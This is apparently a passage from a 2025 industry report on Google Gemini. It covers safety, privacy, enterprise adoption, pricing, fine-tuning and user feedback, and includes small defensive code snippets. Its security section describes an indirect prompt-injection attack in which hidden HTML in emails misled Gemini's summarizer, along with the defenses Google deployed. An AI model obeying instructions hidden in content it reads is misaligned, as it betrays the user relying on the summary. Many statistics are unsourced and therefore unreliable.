- Safety tuning has improved usability in high-context enterprise and educational settings.

Bias & Fairness Evaluations: Progress and Constraints

- Google has acknowledged bias amplification as an inherent LLM challenge.

- Fairness audits in Gemini are predominantly conducted in American English.

- Bias testing is primarily limited to race, gender, ethnicity, and religion.

- There is insufficient linguistic and cultural evaluation outside Western contexts—creating risk in global deployment.

Security Vulnerabilities and Prompt Injection Threats

Prompt Injection: A Persistent Adversarial Threat

- In July 2025, Gemini’s email summarization tool was exploited using indirect prompt injection.

- Attackers embedded invisible HTML instructions within emails, leading Gemini to misinterpret content without detection.

- Google has deployed multiple security layers against this class of attack, including:

- Prompt injection classifiers

- Security thought reinforcement

- Markdown sanitization

- Suspicious URL redaction

- Even with these layers in place, the vulnerability remained viable post-patch, highlighting the limitations of current defenses.
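
The hidden-HTML technique described above can be partly countered before a message ever reaches a summarizer. The following is a minimal sketch, not Google's actual defense: it assumes the attack relies on inline styles such as `display:none` or `font-size:0`, and the names `HIDDEN_STYLE`, `VisibleTextExtractor`, and `visible_text` are hypothetical. It uses only Python's standard `html.parser` module and will miss text hidden through CSS classes, external stylesheets, or color tricks.

```python
import re
from html.parser import HTMLParser

# Assumed heuristics: inline styles commonly used to hide text from a human reader.
HIDDEN_STYLE = re.compile(
    r"display:none|visibility:hidden|font-size:0(?![.\d])|opacity:0(?![.\d])"
)
# Elements with no closing tag; they never open a hidden region.
VOID_TAGS = {"area", "base", "br", "col", "embed", "hr", "img", "input",
             "link", "meta", "source", "track", "wbr"}


class VisibleTextExtractor(HTMLParser):
    """Collects only the text a human reader would plausibly see."""

    def __init__(self):
        super().__init__()
        self.open_flags = []    # one flag per open element: did it start a hidden region?
        self.hidden_depth = 0   # number of enclosing hidden elements
        self.chunks = []

    def handle_starttag(self, tag, attrs):
        if tag in VOID_TAGS:
            return
        style = (dict(attrs).get("style") or "").replace(" ", "").lower()
        is_hidden = bool(HIDDEN_STYLE.search(style))
        self.open_flags.append(is_hidden)
        self.hidden_depth += is_hidden

    def handle_endtag(self, tag):
        if tag in VOID_TAGS or not self.open_flags:
            return
        self.hidden_depth -= self.open_flags.pop()

    def handle_data(self, data):
        # Drop any text nested inside a hidden element.
        if self.hidden_depth == 0 and data.strip():
            self.chunks.append(data.strip())


def visible_text(html):
    """Return the email body with inline-hidden text removed."""
    parser = VisibleTextExtractor()
    parser.feed(html)
    parser.close()
    return " ".join(parser.chunks)
```

Passing only `visible_text(email_html)` to a summarizer narrows one injection path; it complements rather than replaces the classifier and sanitization layers listed above.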

Security Testing Scores (2025)

| Vulnerability Type | Pass Rate (Gemini 2.5 Pro) | Industry Concern |

|---|---|---|

| Pliny Prompt Injection | 0% | Critical failure point |

| Direct PII Exposure | 66.67% | Needs improvement |

These figures suggest the Gemini architecture still lacks sufficient adversarial robustness for secure enterprise deployment without layered countermeasures.

Data Privacy, Sensitive Information & Compliance Challenges

PII Management and Data Handling

- Google’s Sensitive Data Protection API automatically detects and masks sensitive personal data (e.g., health, banking, biometric data).

- However, Gemini is explicitly not compliant with:

- HIPAA (Health Insurance Portability and Accountability Act)

- PCI-DSS (Payment Card Industry Data Security Standard)

- API terms discourage uploading sensitive information unless legally required and secured externally.

- Data deletion is not guaranteed—most user data is retained for monitoring and safety audits.
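
Because the API terms discourage uploading sensitive data, one common precaution is to mask obvious identifiers on the client before a prompt is sent. The sketch below is an assumption-laden illustration using plain regular expressions; it does not call Google's Sensitive Data Protection API, and the pattern set (`PII_PATTERNS`) and function name (`mask_pii`) are hypothetical. Real detectors cover far more formats and locales.

```python
import re

# Illustrative patterns only; they will miss many real-world formats.
PII_PATTERNS = {
    "EMAIL": re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}"),
    # 13 to 16 digits, optionally separated by single spaces or hyphens.
    "CARD": re.compile(r"\b\d(?:[ -]?\d){12,15}\b"),
    "US_SSN": re.compile(r"\b\d{3}-\d{2}-\d{4}\b"),
}


def mask_pii(text):
    """Replace matches with a [LABEL] placeholder and report how many were masked."""
    counts = {}
    for label, pattern in PII_PATTERNS.items():
        text, n = pattern.subn(f"[{label}]", text)
        counts[label] = n
    return text, counts
```

The returned counts can be logged so that a team can audit how often sensitive values appear in outgoing prompts without storing the values themselves.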

Privacy Policy Controversies: July 2025 Android Incident

- On July 7, 2025, the Gemini app silently gained full access to Android system components (messages, calls, WhatsApp, device utilities) by default.

- This occurred via a privacy policy update on June 11, with no proactive user notification.

- Users needed to manually disable access.

- Collected data may be used to train Gemini-powered AI features even if “Gemini Apps Activity” is turned off.

This event triggered renewed privacy concerns, especially across the EU, where GDPR frameworks mandate explicit consent and data minimization principles.

Responsible AI Governance and International Collaboration

Global Governance Participation

- Google actively contributes to the 2025 International Scientific Report on the Safety of Advanced AI, a multilateral effort involving the UK, EU, and US.

- Focus areas:

- Mitigating misuse of general-purpose AI

- Strengthening auditability and interpretability

- Forecasting catastrophic and misuse risks of autonomous systems

Enterprise-Grade AI Governance Layer

- Gemini’s integration into Google’s unified data and AI platform provides:

- Central governance architecture

- Access control enforcement

- Monitoring for anomaly detection and performance degradation

- This governance layer is crucial for enterprise compliance, particularly in regulated verticals like finance, healthcare, and legal services.

Gemini Safety & Compliance Matrix (2025)

| Domain | Metric/Finding | Status/Score | Source/Context |

|---|---|---|---|

| Bias & Fairness | Evaluated on American English | Limited global applicability | Internal fairness audit scope |

| | Bias amplification risk | Acknowledged limitation | LLM architecture inherent bias |

| Toxicity & Refusals | Model helpfulness (vs. Gemini 1.5) | Markedly improved | User feedback reports |

| | Over-refusal tendencies | Reduced | Better tuning and guardrails |

| Security (Prompt Injection) | Indirect prompt injection (email summarization) | Exploitable post-patch | Reported by BankInfoSecurity and test labs |

| | Pliny Injection Test | 0% pass rate | Adversarial security benchmark |

| | Gemini’s defenses | Multiple but bypassed | Content classifier stack, markdown sanitization, etc. |

| PII & Sensitive Data | Direct PII vulnerability | 66.67% pass rate | Manual security audit |

| | HIPAA/PCI-DSS compatibility | Not supported | Google API documentation |

| | Data deletion | Retained for monitoring | API usage terms |

| Privacy & Data Consent | Android system access (July 2025) | Enabled by default | No user opt-in; triggered by policy change |

| | Data used in AI training | Yes | Even when Gemini Apps Activity disabled |

| Regulatory Risk | Prior fines | $2.9 billion (2024) | Antitrust and data privacy violations |

| | Future exposure (EU/GDPR) | High | Android data policy under scrutiny |

| Governance & Global Policy | Participation in international AI safety reports | Active | UK, EU, US multilateral working groups |

| | Central enterprise governance layer | Deployed | For AI lifecycle monitoring and audit control |

Final Observations: Trust, Transparency, and the Path Forward

Google’s handling of Gemini’s safety, privacy, and ethical deployment in 2025 reflects both commendable ambition and areas of unresolved tension. While Gemini 2.5 represents one of the most tightly governed LLM architectures to date, persistent risks—including prompt injection, limited fairness evaluations, and automatic data access—signal that responsible AI governance remains a moving target.

The convergence of public scrutiny, enterprise demand, and regulatory pressure in 2025 has elevated “responsibility as infrastructure” to a core strategic imperative. For Google to scale Gemini sustainably across sectors and geographies, it must not only engineer smarter models—but also build enduring trust through transparency, opt-in user control, and robust risk mitigation frameworks.

6. Business Impact & Enterprise Adoption

In 2025, Google Gemini has evolved into a cornerstone of enterprise digital transformation, transcending its experimental origins to become a mission-critical platform for operational intelligence, productivity, and direct revenue optimization. Its adoption curve has accelerated sharply, driven by integrated deployment in Google Workspace, its scalability via Vertex AI, and seamless inclusion in advertising ecosystems.

Widespread Enterprise Deployment and Operational Scale

Adoption Across Business Ecosystems



- 46% of U.S. enterprises had incorporated Gemini into their workflows by mid-2025, doubling the adoption rate compared to 2024.

- Over 27 million enterprise users globally are actively using Gemini Pro as of June 2025.

- 63% of total Gemini usage is attributed to enterprise environments, reflecting strong alignment with professional and business tasks.

- 41% of Fortune 500 companies have implemented Gemini in at least one operational department, demonstrating its penetration at the upper echelon of corporate structures.

Google Workspace Integration Metrics

- 2.3+ billion document interactions recorded through Gemini-augmented Workspace tools in H1 2025.

- AI is embedded within Docs, Sheets, Gmail, and Meet to enhance content drafting, summarization, scheduling, and internal communication.

Industry-Specific Impact and Case Studies

High-Growth Vertical Adoption

- Healthcare and Finance are experiencing the fastest Gemini adoption, with a 3.4x increase in enterprise deployment in 2025.

- Gemini supports medical triage and intake chatbots across 7,000+ hospitals globally.

- In financial services, 22% of firms use Gemini for fraud detection, compliance analysis, and risk modeling.

- Real estate firms using Gemini report a 31% acceleration in property data processing.

Notable Case Study: Hospitality Sector

- A global hotel chain partnered with Accenture and Google Cloud (BigQuery, Vertex AI, Gemini, and Ads) to build an AI agent for content localization.

- Content creation time reduced by 90% (from weeks to hours).

- Team productivity increased by 50%.

- Ad-driven revenue rose by 22%.

- Return on ad spend (ROAS) improved by 35%.

Revenue Enablement and Advertising Synergy

Gemini’s Role in Advertising & Commerce

- Deep integration within Google Ads provides:

- AI-powered ad asset generation

- Enhanced campaign reporting and predictive analytics

- Personalized copywriting for specific demographics and regions

- Demand Gen campaigns using Gemini-enhanced creative saw:

- 26% YoY increase in conversions per dollar spent on lead generation and purchases.

AI in Retail and E-Commerce

- Gemini powers several Shopping innovations:

- Virtual try-ons for apparel

- AI-curated product collections

- Agent-led checkout workflows

- Designed to increase user conversion rates and reduce friction in purchase flows.

API Pricing Strategy and Market Segmentation

Google’s flexible, usage-based pricing model ensures accessibility for a wide range of developers and enterprise clients. The pricing structure is designed to promote both low-latency experimentation and high-throughput production deployments.

Gemini API Cost Structure (2025)

| Model | Input Token Cost | Output Token Cost | Strategic Notes |

|---|---|---|---|

| Gemini 1.0 Pro | $0.002 per 1K tokens | $0.006 per 1K tokens | Entry-tier for productivity and business automation workflows |

| Gemini 1.5 Pro | $0.007 per 1K tokens | $0.021 per 1K tokens | Advanced model for complex reasoning, planning, and enterprise logic |

| Gemini 1.5 Flash | $0.07 per 1M tokens | $0.30 per 1M tokens | Optimized for high-volume, low-cost use cases |

| Batch Jobs | 50% off standard rates | 50% off standard rates | Designed for asynchronous, large-scale, non-real-time applications |

| Gemini Search Query | $0.006 – $0.031 per query | N/A | Cost estimate for consumer-facing search augmentation |
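
Because the table mixes per-1K and per-1M rates, comparing models is easier once everything is expressed per million tokens. The sketch below does that conversion and estimates the cost of a workload. The rates are copied from the table above (per-1K prices multiplied by 1,000); the dictionary keys and the names `Price`, `PRICES`, and `estimate_cost` are hypothetical labels, not official model identifiers or an official calculator.

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class Price:
    input_per_million: float   # USD per 1M input tokens
    output_per_million: float  # USD per 1M output tokens


# Rates from the table above, normalized to USD per 1M tokens.
PRICES = {
    "gemini-1.0-pro": Price(2.00, 6.00),      # $0.002 / $0.006 per 1K
    "gemini-1.5-pro": Price(7.00, 21.00),     # $0.007 / $0.021 per 1K
    "gemini-1.5-flash": Price(0.07, 0.30),    # already quoted per 1M
}
BATCH_DISCOUNT = 0.5  # "50% off standard rates" for batch jobs


def estimate_cost(model, input_tokens, output_tokens, batch=False):
    """Estimate the USD cost of one workload under the table's rates."""
    price = PRICES[model]
    cost = (input_tokens * price.input_per_million
            + output_tokens * price.output_per_million) / 1_000_000
    return cost * (1 - BATCH_DISCOUNT) if batch else cost
```

Under these rates, a job with 1M input tokens and 200K output tokens costs about $11.20 on the 1.5 Pro tier and about $0.13 on 1.5 Flash, or roughly half of each in batch mode.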

Strategic Implications of Pricing

- Flash models are orders of magnitude cheaper than GPT-4 (roughly $0.06 per 1K output tokens at launch), targeting:

- Startups

- E-commerce integrations

- High-frequency content generation at scale

- Batch jobs reduce costs for back-end processing, archival summarization, and enterprise document automation.

- Higher pricing for Pro variants reflects their focus on:

- Legal reasoning

- Code transformation

- Financial modeling

- Agentic operations with persistent memory

Revenue Impact Summary: Gemini as a Growth Multiplier

Quantifiable Business Outcomes Attributed to Gemini (2025)

| Impact Area | Performance Gains |

|---|---|

| Document Automation | 2.3+ billion Gemini-assisted document interactions in Workspace (H1 2025) |

| Enterprise Adoption | 63% of total Gemini use |

| Healthcare Integration | 7,000+ hospitals with Gemini-powered chat agents |

| Finance Sector Deployment | 22% of financial services firms using Gemini for fraud detection, compliance, and risk modeling |

| Demand Gen Conversion Lift | +26% YoY in conversions per dollar |

| Advertising ROI | +35% in ROAS (hospitality case study) |

| Team Productivity | +50% team productivity (hospitality case study) |

These gains reflect the convergence of AI and automation, enabling businesses to scale faster, reduce operational friction, and enhance customer-facing outcomes. Gemini is increasingly positioned as a full-stack AI productivity engine within Google’s ecosystem and across the enterprise value chain.

Conclusion: Gemini as an Economic Force in AI Transformation

The business performance of Google Gemini in 2025 underscores its transition from an advanced language model to a central enterprise enabler with measurable commercial outcomes. Its successful integration across verticals, especially in productivity software, healthcare, finance, and marketing, reflects a maturing AI platform with tangible returns on investment. As Google continues to refine model capabilities and pricing flexibility, Gemini stands as a critical asset in the evolving landscape of AI-driven business operations.

7. Training & Fine-Tuning Metrics

In 2025, Google has cemented a methodologically advanced and performance-oriented framework for training, evaluating, and fine-tuning its Gemini models. The company’s focus is on achieving precise model behavior, enhanced generalization, and sustained efficiency across diverse application domains. This training architecture not only informs core updates to Gemini but also plays a vital role in Google’s ability to deliver custom solutions through Vertex AI for enterprises.

Core Fine-Tuning Metrics and Evaluation Framework

Foundational Training Metrics

Google’s internal training protocols for Gemini models rely on rigorous monitoring of primary learning indicators:

- Total Loss (Training Loss)

- Reflects the model’s cumulative error during training.

- A steady decline indicates effective learning from the training dataset.

- Validation Loss

- Monitors performance on unseen validation data.

- Validation loss that rises while training loss keeps falling suggests overfitting, a condition where the model memorizes training data patterns without generalizing.

- Fraction of Correct Next-Step Predictions

- Measures the model’s predictive performance on sequential tasks.

- This metric must increase consistently to validate the model’s improving accuracy in real-world decision-making scenarios.
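
The three indicators above can be checked mechanically from logged training curves. The following is a small illustrative sketch, not Google's internal tooling: `first_overfit_epoch` and `next_token_accuracy` are hypothetical helper names, and the `patience` threshold of two consecutive epochs is an arbitrary assumption.

```python
def first_overfit_epoch(train_loss, val_loss, patience=2):
    """Return the index of the first epoch in a run of `patience` epochs where
    validation loss rose while training loss kept falling, or None."""
    streak = 0
    for i in range(1, min(len(train_loss), len(val_loss))):
        diverging = val_loss[i] > val_loss[i - 1] and train_loss[i] < train_loss[i - 1]
        if diverging:
            streak += 1
            if streak == patience:
                return i - patience + 1
        else:
            streak = 0
    return None


def next_token_accuracy(predicted, target):
    """Fraction of positions where the predicted next token matches the target."""
    if not target:
        return 0.0
    correct = sum(p == t for p, t in zip(predicted, target))
    return correct / len(target)
```

A run whose training loss falls every epoch while validation loss turns upward at epoch 3 would be flagged at index 3, which is a reasonable point to stop training or restore an earlier checkpoint.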

Model Evaluation Methodologies

Google adopts a dual-layered approach for evaluating Gemini outputs, combining both subjective and objective assessments:

- Model-Based Metrics

- Utilize judge models (often Gemini itself) to assess:

- Conciseness

- Relevance

- Correctness

- Can be implemented in:

- Pointwise evaluation (single-output scoring)

- Pairwise evaluation (comparative scoring between outputs)

- Computation-Based Metrics

- Employ traditional scoring mechanisms such as:

- ROUGE (Recall-Oriented Understudy for Gisting Evaluation)

- BLEU (Bilingual Evaluation Understudy)

- Compare model output against ground truth references.

- Offer statistical rigor for summarization, translation, and extractive tasks.

Gemini Evaluation Metrics Matrix (2025)

| Metric Type | Methodology | Purpose | Notes |

|---|---|---|---|

| Total Loss | Training-based | Measures fit on training dataset | Declining values signify effective learning |

| Validation Loss | Evaluation-based | Measures generalization | Used to detect overfitting |

| Correct Next-Step Fraction | Sequential prediction metric | Evaluates predictive accuracy | Should trend upward during training |

| ROUGE/ BLEU | Statistical computation | Assesses summarization and translation quality | Industry-standard for NLP evaluation |

| Model-as-Judge | AI-internal qualitative scoring | Evaluates semantic quality | Enables scalable output grading |

| Pointwise & Pairwise Scoring | Structured comparative models | Benchmarks output relevance and performance | Enhances comparative model diagnostics |
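
To make the computation-based row of the matrix concrete, here is a simplified ROUGE-1 implementation (unigram overlap with clipped counts) plus a pairwise comparison built on it. This is a sketch under stated assumptions: it tokenizes on whitespace, ignores stemming and multi-reference scoring, and the pairwise function uses ROUGE-1 F1 as a stand-in scorer where a production setup would typically call a judge model. The function names are hypothetical.

```python
from collections import Counter


def rouge1(candidate, reference):
    """Simplified ROUGE-1: unigram overlap between a candidate and one reference."""
    cand = Counter(candidate.lower().split())
    ref = Counter(reference.lower().split())
    overlap = sum((cand & ref).values())  # clipped count of shared unigrams
    precision = overlap / max(sum(cand.values()), 1)
    recall = overlap / max(sum(ref.values()), 1)
    f1 = 0.0 if overlap == 0 else 2 * precision * recall / (precision + recall)
    return {"precision": precision, "recall": recall, "f1": f1}


def pairwise_winner(output_a, output_b, reference):
    """Pairwise evaluation: which output scores higher against the reference?"""
    a = rouge1(output_a, reference)["f1"]
    b = rouge1(output_b, reference)["f1"]
    if a == b:
        return "tie"
    return "A" if a > b else "B"
```

Calling `rouge1` on a single output corresponds to pointwise scoring, while `pairwise_winner` mirrors the comparative setup; swapping the scorer for a model-based judge changes the signal but not the structure.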

Fine-Tuning Landscape in 2025: Vertex AI as the Strategic Hub

Shift to Vertex AI for Custom Fine-Tuning

- Direct Gemini API Fine-Tuning Deprecation

- In May 2025, support for Gemini 1.5 Flash-001 fine-tuning via the direct Gemini API was officially deprecated.

- Google has indicated future reintroduction, but presently channels all fine-tuning through Vertex AI.

- Vertex AI as the Enterprise-Grade Fine-Tuning Platform

- Enables supervised fine-tuning for Gemini variants like `gemini-2.5-flash`.

- Designed for domain-specific adaptation, critical for tasks with proprietary lexicons, non-standard formats, or nuanced requirements.

Benefits of Fine-Tuning with Vertex AI

- Enhances task-specific precision in:

- Summarization

- Classification

- Chat optimization

- Extractive Question Answering

- Allows for prompt simplification by reducing dependence on few-shot prompting strategies.

- Ideal for workflows where:

- Prompt engineering fails to yield consistent results.

- Tasks involve tacit knowledge or complex decision logic.

- Customization is required at scale for regulated or industry-specific content.

Limitations and System Parameters



| Constraint | Maximum Value | Description |

|---|---|---|

| Input/Output Token Limit | 131,072 tokens | Cumulative training token cap per example |

| Validation Dataset Size | 5,000 examples | Used to prevent overfitting and ensure evaluation accuracy |

| Training Dataset Size | 1 million text-only / 300K multimodal | Total training examples allowed per fine-tuning operation |

| Supported Tasks | Classification, QA, Summarization | Must align with supervised learning patterns |

| Fine-Tuning Duration | Varies by compute and data volume | Typically completed in hours to days via Vertex infrastructure |
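
The limits in this table lend themselves to a pre-flight check before a tuning job is submitted. The sketch below validates a text-only dataset against the three numeric caps listed above. It is an illustration only: the example schema (`input` and `output` keys), the `check_dataset` name, and the whitespace-based `approx_tokens` counter are assumptions, and a real tokenizer will produce different counts.

```python
# Caps taken from the table above (text-only tuning).
MAX_TOKENS_PER_EXAMPLE = 131_072
MAX_VALIDATION_EXAMPLES = 5_000
MAX_TRAINING_EXAMPLES = 1_000_000


def approx_tokens(text):
    """Crude stand-in for a tokenizer: counts whitespace-separated words."""
    return len(text.split())


def check_dataset(train, validation, count_tokens=approx_tokens):
    """Return a list of human-readable problems; an empty list means no cap was hit."""
    problems = []
    if len(train) > MAX_TRAINING_EXAMPLES:
        problems.append(f"training set has {len(train)} examples, limit is {MAX_TRAINING_EXAMPLES}")
    if len(validation) > MAX_VALIDATION_EXAMPLES:
        problems.append(f"validation set has {len(validation)} examples, limit is {MAX_VALIDATION_EXAMPLES}")
    for i, example in enumerate(train):
        total = count_tokens(example["input"]) + count_tokens(example["output"])
        if total > MAX_TOKENS_PER_EXAMPLE:
            problems.append(f"train[{i}]: {total} tokens exceeds {MAX_TOKENS_PER_EXAMPLE}")
    return problems
```

Passing a real tokenizer's counting function as `count_tokens` would make the per-example check meaningful for production data.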

Strategic Implications: Customization at Scale

- Enterprise Advantage

- Centralizing fine-tuning capabilities within Vertex AI enables:

- Scalable MLOps with enterprise-grade governance

- Advanced data security and compliance tracking

- Native support for Google Cloud infrastructure integration

- Allows enterprises to unlock higher model accuracy, task efficiency, and customer personalization.

- Alignment with Regulatory Demands

- Vertex AI’s structured governance aligns with data governance requirements in finance, healthcare, and government sectors.

- Ensures that fine-tuned models adhere to internal compliance policies and external regulations.

Conclusion: A Closed-Loop System of Model Refinement

Google’s approach to training and fine-tuning Gemini models in 2025 reveals a sophisticated interplay of statistical rigor, model interpretability, and enterprise-focused deployment. The transition to Vertex AI for fine-tuning signals a strategic consolidation of advanced model customization under a secure, scalable, and regulation-ready platform. This unified ecosystem not only strengthens Gemini’s adaptability across industries but also reinforces Google Cloud’s position as a dominant force in enterprise-grade generative AI.

8. User Feedback & Experience

In 2025, Google Gemini stands at the intersection of innovation and end-user interaction. While the platform has earned commendation for its personalization capabilities and strategic ecosystem integration, it also faces significant scrutiny from technical users due to unresolved bugs and support inconsistencies. A comprehensive analysis of user sentiment reveals a complex balance between value delivery, system reliability, and support responsiveness.

Feedback Collection Mechanisms and User Engagement Channels

Google employs a structured and multi-layered approach to capture user sentiment and improve Gemini’s model performance:

- Feedback Submission Tools

- Integrated feedback icons like “Thumbs Up” and “Thumbs Down” within Gemini interfaces (e.g., Workspace, IDEs).

- Optional inclusion of original prompts and responses for targeted evaluation and system refinement.

- Survey-Based Collection

- Periodic user surveys such as the Gemini for Google Cloud survey provide a broader understanding of enterprise user needs and expectations.

- Developer Channels

- Technical user feedback is gathered from:

- Developer discussion forums

- GitHub issue trackers

- Bug submission portals

- These channels surface real-time reports on performance issues, model limitations, and usability friction.

Positive Sentiment Trends and Feature Value Propositions

Strengths in Personalization and Search Integration

- Users widely praise Gemini’s context-aware memory and personalized recommendation features:

- Integration with Google Search history and chat memory enhances utility for:

- Brainstorming creative ideas

- Recalling past research

- Accelerating discovery workflows

- These features are frequently described as “highly useful for productivity”, reflecting a positive alignment between Gemini’s core functionality and user expectations.

Engagement Metrics (2025)

| Metric | Value | Interpretation |

|---|---|---|

| Session Engagement Growth | +45% YoY | Indicates rising user interest and reliance on Gemini |

| Average Time-on-Platform | 11.4 minutes per session | Suggests consistent, sustained user engagement |

| User Feedback Submissions (Est.) | Tens of thousands weekly | Reflects active community involvement in system improvement |

| Feature Satisfaction (Personalization) | Strong qualitative sentiment | Indicates Gemini is perceived as increasingly helpful |

Persistent Technical Issues and Developer Frustrations

Despite encouraging feedback on personalization, developers have surfaced recurring issues affecting trust, reliability, and operational cost control.

Model-Specific Bugs and System Failures

- Gemini 2.5 Pro

- Reports of persistent inaccuracy and “BAD performance” in complex reasoning tasks.

- Observed high latency:

- Average latency: 35 seconds

- 99th percentile latency: 8 minutes

- Rate-limiting exceptions remain a frequent bottleneck in high-throughput environments.

- Gemini 2.5 Flash

- Known to enter infinite generation loops, resulting in:

- Massive, repetitive, non-informative outputs.

- Unexpected high billing costs due to uncontrolled token generation.

Developer Impact Matrix

| Issue | Model Affected | Consequence | Severity |

|---|---|---|---|

| Infinite Text Generation | Gemini 2.5 Flash | Unintended usage spikes and high billing | High |

| Persistent Inaccurate Responses | Gemini 2.5 Pro | Reduced trust in mission-critical environments | Medium |

| Latency Spikes | Gemini 2.5 Pro | Delayed outputs in real-time applications | High |

| Rate Limiting Exceptions | Gemini 2.5 Flash/Pro | API interruptions and failed queries | High |

| Unresolved Billing Disputes | All models (via Cloud API) | User frustration with unacknowledged overcharges | High |
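
The infinite-generation issue in the matrix above is the kind of failure a client can partially contain on its own side. The sketch below consumes a stream of text chunks and stops when either a token budget is exhausted or the tail of the output starts repeating with a short period. It is a hypothetical client-side guard, not a documented Gemini feature: the function names, the whitespace tokenization, and the thresholds (`max_period=50`, `min_repeats=4`) are all assumptions.

```python
def repeated_period(tokens, max_period=50, min_repeats=4):
    """Return the period p if the last p * min_repeats tokens are one block of
    p tokens repeated back to back, otherwise None."""
    for period in range(1, max_period + 1):
        span = period * min_repeats
        if len(tokens) < span:
            break
        tail = tokens[-span:]
        if all(tail[i] == tail[i + period] for i in range(span - period)):
            return period
    return None


def consume(chunks, max_tokens=1024, max_period=50, min_repeats=4):
    """Read streamed chunks and return (tokens, stop_reason)."""
    tokens = []
    for chunk in chunks:
        tokens.extend(chunk.split())
        if len(tokens) >= max_tokens:
            return tokens[:max_tokens], "token_budget"  # hard cap on spend
        if repeated_period(tokens, max_period, min_repeats) is not None:
            return tokens, "repetition"                 # likely runaway loop
    return tokens, "complete"
```

Because `consume` stops reading as soon as a condition trips, the caller can cancel the underlying request at that point. Setting a maximum output length on the request itself, where the API offers one, remains the more direct cost control.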

Support Responsiveness and Escalation Limitations

- Feedback suggests Google Cloud Billing Support has not adequately addressed the root cause of billing bugs:

- Instead of investigating model-level issues, support agents often redirect users to cost-saving documentation (e.g., context caching).

- This misalignment undermines user trust and points to a gap in escalation procedures within Google’s support infrastructure.

- Developer forums voice concern over:

- Slow bug resolution cycles

- Lack of acknowledgment for production-critical issues

- Inadequate transparency on progress or fixes

These gaps could hinder enterprise confidence, particularly in regulated or cost-sensitive industries.

User Experience Takeaways: Trust Balanced by Utility

Despite technical concerns, the majority of users continue to perceive value in Gemini’s integration and evolving capabilities.

Key Observations:

- Productivity enhancements from personalization features have proven effective at retaining users.

- Engagement growth metrics imply that Gemini is becoming a central part of daily workflows.

- However, engineering teams in high-performance environments remain cautious due to:

- Latency inconsistencies

- Unpredictable cost behavior

- Delayed support responsiveness

Summary Matrix: User Sentiment Analysis (2025)

| Sentiment Area | General User Base | Developer/Technical User Base | Notes |

|---|---|---|---|

| Personalization Features | Highly Positive | Neutral to Positive | Appreciated across all segments |

| Stability & Performance | Generally Acceptable | Mixed | Reliability varies by model and load |

| Support Experience | Neutral | Negative | Escalation flow appears fragmented |

| Billing Transparency | Unclear | Critical Concern | Directly affects cloud budgets |

| Adoption Momentum | Strong | Growing with Caution | Usage expanding despite technical friction |

Conclusion: Experience-Led Growth Meets Systemic Challenges

The user feedback surrounding Gemini in 2025 paints a bifurcated picture. While mainstream users benefit from productivity-centric features, advanced users and developers remain wary of unresolved performance limitations and inadequate support pathways. Google must address these pain points decisively to sustain momentum and position Gemini as a dependable enterprise AI platform.

9. Custom GPT/Plugin Performance & Ecosystem

In 2025, Google Gemini’s progression from a powerful language model into a dynamic, agent-driven ecosystem marks one of the most transformative developments in enterprise AI adoption. With an emphasis on extensibility, real-time multimodal processing, and end-to-end task automation, Google is positioning Gemini not merely as a chatbot—but as a ubiquitous cognitive infrastructure embedded throughout its ecosystem.

Prompt Engineering: The Enduring Influence of Input Design

Despite improvements in model architecture and the rise of “thinking models” such as Gemini 2.5, prompt engineering remains foundational for optimal output generation:

- Performance in Simple vs. Complex Tasks

- Gemini models yield acceptable responses in basic use cases with minimal prompting.

- However, performance in complex tasks—multi-turn reasoning, data transformation, or structured output—still depends heavily on clear, domain-specific prompt design.

- Educational Resources

- Google’s “Prompting Guide 101” and Gemini documentation provide structured guidance for:

- Prompt modularity

- Tool invocation phrasing

- Handling model hallucination

- These resources help end users, Workspace professionals, and developers enhance reliability and consistency.

- UX Implication

- The continued need for prompt engineering underlines the importance of:

- Prompt-building interfaces

- Template libraries

- Natural language abstraction layers (e.g., Gemini Actions)

Prompt Optimization Metrics

| Aspect | Gemini Effectiveness (2025) | Implication |

|---|---|---|

| Simple task performance | High with minimal prompting | User-friendly for beginners |

| Complex task performance | High with effective prompting | Requires user skill or structured templates |

| Availability of prompting tools | Expanding via docs, SDKs, APIs | Lowers entry barriers for power users |

Plugin Architecture and Agentic API Capabilities

Gemini’s transformation into an agentic AI system is underpinned by its powerful plugin and API orchestration layer. This infrastructure allows Gemini to go beyond generating text and into executing real-world tasks autonomously.

Agentic Integration Features

- Function Calling API

- Enables Gemini to access calculators, calendars, email APIs, and more.

- Supports autonomous planning and tool usage across multi-step workflows.

- Batch Mode Execution

- Ideal for non-latency-sensitive enterprise workloads.

- Supports high-throughput operations, particularly useful in coding, classification, and document summarization pipelines.

- State Retention and “Deep Think” Memory

- Experimental state management capabilities allow Gemini to:

- Remember multi-step task flows

- Revisit context after interruptions

- Provide more stable agent behavior over time

Gemini 1.5 Flash-8B Agent Profile (2025)

| Capability | Performance | Use Case Fit |

|---|---|---|

| Code quality (agent tasks) | 83% success rate | Reliable for code generation & transformation |

| Latency | 0.37 seconds | Suitable for interactive systems |

| Cost | $0.075 per million tokens | Scales well for large, repetitive jobs |
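
The function-calling pattern described under Agentic Integration Features follows a simple loop: the model emits a structured request naming a tool and its arguments, the application runs the tool, and the result is returned to the model. The sketch below shows only the application side. The JSON shape (`name` and `args`), the `tool` decorator, and the two example tools are hypothetical and do not reproduce the Gemini API's wire format.

```python
import json
from datetime import date

TOOLS = {}


def tool(fn):
    """Register a plain Python function as a callable tool."""
    TOOLS[fn.__name__] = fn
    return fn


@tool
def add(a, b):
    return a + b


@tool
def days_between(start, end):
    """Number of days from one ISO date (YYYY-MM-DD) to another."""
    return (date.fromisoformat(end) - date.fromisoformat(start)).days


def dispatch(call_json):
    """Run one model-requested call and always return a structured result,
    so that failures are explicit rather than silent."""
    try:
        call = json.loads(call_json)
    except json.JSONDecodeError as exc:
        return {"ok": False, "error": f"malformed call: {exc.msg}"}
    if not isinstance(call, dict):
        return {"ok": False, "error": "malformed call: expected a JSON object"}
    fn = TOOLS.get(call.get("name"))
    if fn is None:
        return {"ok": False, "error": f"unknown tool: {call.get('name')}"}
    try:
        return {"ok": True, "result": fn(**call.get("args", {}))}
    except (TypeError, ValueError) as exc:
        return {"ok": False, "error": str(exc)}
```

Returning an explicit `ok` flag for every call gives the orchestrating code a consistent way to detect unknown tools, bad arguments, or malformed requests before the result is passed back to the model.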

Ecosystem Integration: From Search to Smartwatches

Gemini’s plugin and SDK ecosystem is strategically designed to embed AI capabilities across all of Google’s surfaces, enabling an “ambient AI” experience that blends seamlessly into the user’s daily environment.

Adoption Milestones (2025)

- AI Overviews in Search

- Now powered by a custom Gemini 2.5 model

- Serves 1.5 billion users monthly

- Noted +10% user engagement increase in key international markets

- Gemini Agents

- Enabled via APIs and SDKs

